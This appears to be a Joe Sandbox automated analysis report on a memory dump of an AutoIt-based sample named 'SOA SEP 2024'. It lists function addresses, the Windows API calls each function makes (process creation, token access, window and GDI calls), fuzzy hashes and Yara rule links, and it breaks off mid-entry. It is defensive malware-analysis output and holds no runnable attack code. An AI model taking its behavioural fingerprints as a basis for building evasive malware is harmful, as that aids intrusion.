Opcode ID: dc7b3f0e29ba2f30743b81698a449440b3af90090930e69b13c8e18d30da887b
Instruction ID: 6a88ce65fe70fd48a47c2aa8f2a7fe03c8bcd08a0ba97602e99ca4e1f7e9a348
Opcode Fuzzy Hash: dc7b3f0e29ba2f30743b81698a449440b3af90090930e69b13c8e18d30da887b
Instruction Fuzzy Hash: 62110872A04244EFCB159B68DC49A9E7BADEB8A311F148315F921D32A1D6788D0187A4

Function 0077D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0077D1BA
GetStockObject.GDI32(00000011), ref: 0077D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0077D1D8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: e8c5e0be70704bbf429dcf25279e573b2c058581f31e438eb0572d8cfc819f64
Instruction ID: 5ef36e92c73cce54f34ce0ba0e70cad1663926bfa3dc1be5abdabccab34534ab
Opcode Fuzzy Hash: e8c5e0be70704bbf429dcf25279e573b2c058581f31e438eb0572d8cfc819f64
Instruction Fuzzy Hash: 1C11A17210254DBFEF224F909C54EEA7B7AFF1C3A5F458101FA0856150C7399C619BA0

Function 00794DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00794E16

Part of subcall function 007954F5: __fltout2.LIBCMT ref: 0079551E

__cftog_l.LIBCMT ref: 00794E3C
__cftoe_l.LIBCMT ref: 00794E6E

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 9a39ae061d7e03511f92067470028919439b47f056a2312aee299f1b93face63
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 9D01363200014AFBCF125E94EC16CEE3F22BB18354B598455FA2859131D33ACAB2AB81

Function 00787452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00787A0D: __getptd_noexit.LIBCMT ref: 00787A0E

__lock.LIBCMT ref: 0078748F
InterlockedDecrement.KERNEL32(?), ref: 007874AC
_free.LIBCMT ref: 007874BF
InterlockedIncrement.KERNEL32(00D33720), ref: 007874D7

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: 1dbdf8137034a7c799f5f6f5df4beca17a3dfb9b70d2a3ababfccea6a812b0f2
Instruction ID: 35ccdde7bf5cd7ffd1bfbcef22d1bac06c8ff14f8b60cde42745929e6ebb60c8
Opcode Fuzzy Hash: 1dbdf8137034a7c799f5f6f5df4beca17a3dfb9b70d2a3ababfccea6a812b0f2
Instruction Fuzzy Hash: 1A01843298A651EBC72EBF64944979DBB64BF04720F248005F42AB7690C73C9941CFD6

Function 007CE32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007CE33D
_memset.LIBCMT ref: 007CE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00823D00,00823D44), ref: 007CE37B
CloseHandle.KERNEL32 ref: 007CE38D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 4faad7189c4b751c2ca43ad3aabe3a079187f37f2a94af9d9f980268d8a58cc3
Instruction ID: eaa0f31aa7ba77a945c9d252bccaf4c1794dcacf78c3ca6a1b4cb89fa83601c9
Opcode Fuzzy Hash: 4faad7189c4b751c2ca43ad3aabe3a079187f37f2a94af9d9f980268d8a58cc3
Instruction Fuzzy Hash: E7F054F1640354BAE2602760AC55F777E5CE704754F008421BF04EA1A2D37D5D1147B8

Function 007CEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0077AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0077AFE3
Part of subcall function 0077AF83: SelectObject.GDI32(?,00000000), ref: 0077AFF2
Part of subcall function 0077AF83: BeginPath.GDI32(?), ref: 0077B009
Part of subcall function 0077AF83: SelectObject.GDI32(?,00000000), ref: 0077B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007CEA8E
LineTo.GDI32(00000000,?,?), ref: 007CEA9B
EndPath.GDI32(00000000), ref: 007CEAAB
StrokePath.GDI32(00000000), ref: 007CEAB9

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 27862cc81ad4b7fc308b9e90cc86886980b487c35c42b65eeb0a65efaa663df6
Instruction ID: efd8ebb98cd0a477154cbba19244b000b6b62630513c46ad3016122cf82eb7ea
Opcode Fuzzy Hash: 27862cc81ad4b7fc308b9e90cc86886980b487c35c42b65eeb0a65efaa663df6
Instruction Fuzzy Hash: 61F05E31006299BBDF229F94AC4DFCE3F19AF1A321F18C105FE11690E1877D9962CB99

Function 0079C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0079C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0079C85D
GetCurrentThreadId.KERNEL32 ref: 0079C864
AttachThreadInput.USER32(00000000), ref: 0079C86B

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b74e72bc1402c97772541035a56d61cf52b0db948ac2f75dac8bffc5341f3930
Instruction ID: f5132785a0a60691ce03cd9f530305bc55577c892dc780a78d8cc66ef1ded8ba
Opcode Fuzzy Hash: b74e72bc1402c97772541035a56d61cf52b0db948ac2f75dac8bffc5341f3930
Instruction Fuzzy Hash: 7AE065711422A87BDF211B61EC4DEDB7F1CEF0A7A1F00C011B60D88450C679C981C7E0

Function 0079B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0079B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0079AC9D), ref: 0079B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0079AC9D), ref: 0079B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0079AC9D), ref: 0079B0F1

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 6091ceb3923ec5e0761081870b9beeaf9d54ddeb51f88d4c5f179944362aa1c9
Instruction ID: ebd976377aaefc42da7f3c001a93dfb5e75f4c9a74c8ba2b36539cc236fb1b49
Opcode Fuzzy Hash: 6091ceb3923ec5e0761081870b9beeaf9d54ddeb51f88d4c5f179944362aa1c9
Instruction Fuzzy Hash: 7FE08632602211DBDB301FB56D4DB873BA8EF59791F01C828F241DE040DB7C9801C764

Function 0077B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0077B496
SetTextColor.GDI32(?,000000FF), ref: 0077B4A0
SetBkMode.GDI32(?,00000001), ref: 0077B4B5
GetStockObject.GDI32(00000005), ref: 0077B4BD
GetWindowDC.USER32(?,00000000), ref: 007DDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 007DDE38
GetPixel.GDI32(00000000,?,00000000), ref: 007DDE51
GetPixel.GDI32(00000000,00000000,?), ref: 007DDE6A
GetPixel.GDI32(00000000,?,?), ref: 007DDE8A
ReleaseDC.USER32(?,00000000), ref: 007DDE95

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 08b842bff5a436a2b038625e89cbd79e1d0c33e3efb7a34c599045b8251f0a91
Instruction ID: cb7b0de19809837f73b1d1f16c6d643451789bee8e913643164c0f206fbe3815
Opcode Fuzzy Hash: 08b842bff5a436a2b038625e89cbd79e1d0c33e3efb7a34c599045b8251f0a91
Instruction Fuzzy Hash: 1FE0ED31101284AADF315F64AC4DBD83B21AB59339F14C666F6A95C0E1D7BA4D81DB11

Function 0079B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0079B2DF
UnloadUserProfile.USERENV(?,?), ref: 0079B2EB
CloseHandle.KERNEL32(?), ref: 0079B2F4
CloseHandle.KERNEL32(?), ref: 0079B2FC

Part of subcall function 0079AB24: GetProcessHeap.KERNEL32(00000000,?,0079A848), ref: 0079AB2B
Part of subcall function 0079AB24: HeapFree.KERNEL32(00000000), ref: 0079AB32

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: abcbfc6e07ccf2b423b5a7ee599d23c781df9dd437a3d1e961de47c408aa88da
Instruction ID: 620d2bd3750b245b2667a2a0f68df38533b356bb9de09f9ecf60c9b364edbc55
Opcode Fuzzy Hash: abcbfc6e07ccf2b423b5a7ee599d23c781df9dd437a3d1e961de47c408aa88da
Instruction Fuzzy Hash: 87E0B63A105045FBCB112BA5EC48859FBAAFF9C321710C221F62585575CB3BA871EB95

Function 007DB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007DB29A
GetDC.USER32(00000000), ref: 007DB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DB2C3
ReleaseDC.USER32 ref: 007DB2E2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 903b8edac92f630d00a1d1d6a3a2a417387081fb094d42a52394357567da36d8
Instruction ID: c8bd1ce3b5f9479aeeff159bbd7dc27459fcf26b82642b38fd835684e88f3907
Opcode Fuzzy Hash: 903b8edac92f630d00a1d1d6a3a2a417387081fb094d42a52394357567da36d8
Instruction Fuzzy Hash: 77E01AB1100244EFDB215F70888862D7BB9EB4C390F11C80AF95E8B211DA7D9C418B54

Function 007DB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 007DB2AE
GetDC.USER32(00000000), ref: 007DB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 007DB2C3
ReleaseDC.USER32 ref: 007DB2E2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 381d684ff4b6585921ec2843560a06d917b612ce8bb62600df4e6ec5df875451
Instruction ID: 4850db4f6da5198cf5d8f27d095a0aa84d9efb7675918c516ff8ce37f442577e
Opcode Fuzzy Hash: 381d684ff4b6585921ec2843560a06d917b612ce8bb62600df4e6ec5df875451
Instruction Fuzzy Hash: AAE012B1500240EFDF215F7088886297BA9EB4C390F11C809F95E8B211DA7EAC018B18

Function 0079DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0079DEAA

Strings

AutoIt3GUI, xrefs: 0079DE22
Container, xrefs: 0079DE29

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: e11ca3402fa455a99e66d245ab5d216eda74e8cd74683ffaed17144ece085e5d
Instruction ID: 2450e35bb0afa844c5ec09c57de784b61246c85b3915bfdabbd97cd8ce7d79e4
Opcode Fuzzy Hash: e11ca3402fa455a99e66d245ab5d216eda74e8cd74683ffaed17144ece085e5d
Instruction Fuzzy Hash: DD914774600601AFDB24CF64D889B6AB7B9FF48710F20856EF95ACB691DB74EC41CB60

Function 007A290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 007A2A72

Strings

I/}, xrefs: 007A297F
I/}, xrefs: 007A29FC, 007A2A64, 007A2A12

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscpy
String ID: I/}$I/}
API String ID: 3048848545-3623143299
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: ef8a3adfee860c6b8f114b5520234d5175e61399b1463e024f62f373700a37b7
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: 0741C235900116AACF25EF9CC4419FDB770EF8A710F54924AE881B7192DA386E83D760

Function 0077BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0077BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0077BCF3

Strings

@, xrefs: 0077BCE8

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: f4a5c3bf39f172cb8e0d869b0114a2cd5cdac06cd2d2489d8d00bffb06dabb26
Instruction ID: 4c225e87c4f5af8dd5dfa7f22da76f67c95b5e4a2e88432076695866258f132d
Opcode Fuzzy Hash: f4a5c3bf39f172cb8e0d869b0114a2cd5cdac06cd2d2489d8d00bffb06dabb26
Instruction Fuzzy Hash: 14513871408744DBE720AF14DC89BAFBBECFF94394F41884DF1D8410A2DB7495A98B66

Function 007AC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 007644ED: __fread_nolock.LIBCMT ref: 0076450B

_wcscmp.LIBCMT ref: 007AC65D
_wcscmp.LIBCMT ref: 007AC670

Strings

FILE, xrefs: 007AC5A5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: fc21dfed06679530641fb8c4066db3eed433e08d96cead4d5472be1603c5f7ac
Instruction ID: ad0a95335c00f42e922d510eca21ba3679a4345dcbd2b00b97bd963eaec34d5b
Opcode Fuzzy Hash: fc21dfed06679530641fb8c4066db3eed433e08d96cead4d5472be1603c5f7ac
Instruction Fuzzy Hash: 5741D972A0024ABBDF11EAA4DC46FEF7BB9EF89714F000069F905E7181DA789A04C751

Function 007CA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 007CA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007CA86F

Strings

', xrefs: 007CA7C3

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: bce91bcbce03300372a442627eff17f691350f0d9469cc7bb359d571251ebf05
Instruction ID: 1c80900ac58e695c82865d087f79f9739dce06f42e78086eaccc4ea9ae98e77e
Opcode Fuzzy Hash: bce91bcbce03300372a442627eff17f691350f0d9469cc7bb359d571251ebf05
Instruction Fuzzy Hash: 3E41F574E01209AFDB54CFA8C884FDA7BB9FB08305F14016EE905AB381D774A942CFA1

Function 007C975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 007C980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007C984A

Strings

static, xrefs: 007C97AA

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: fa2f0d7256f4c7834403c5b581c9867da81394795c1b462e73d03bb5352b2be0
Instruction ID: b875469f3838289d38db7247fb6c558150404686da02866d693b8cf299d34987
Opcode Fuzzy Hash: fa2f0d7256f4c7834403c5b581c9867da81394795c1b462e73d03bb5352b2be0
Instruction Fuzzy Hash: 46316B71110604AAEB209F78CC85FFB73A9FF59760F10861DF9A9C7190DA39AC81C764

Function 007A5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007A5201

Strings

0, xrefs: 007A51BF

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: aa6ad51817fadaf80ad6bd77ca357f86c77d3fd817b127c60193fae431249207
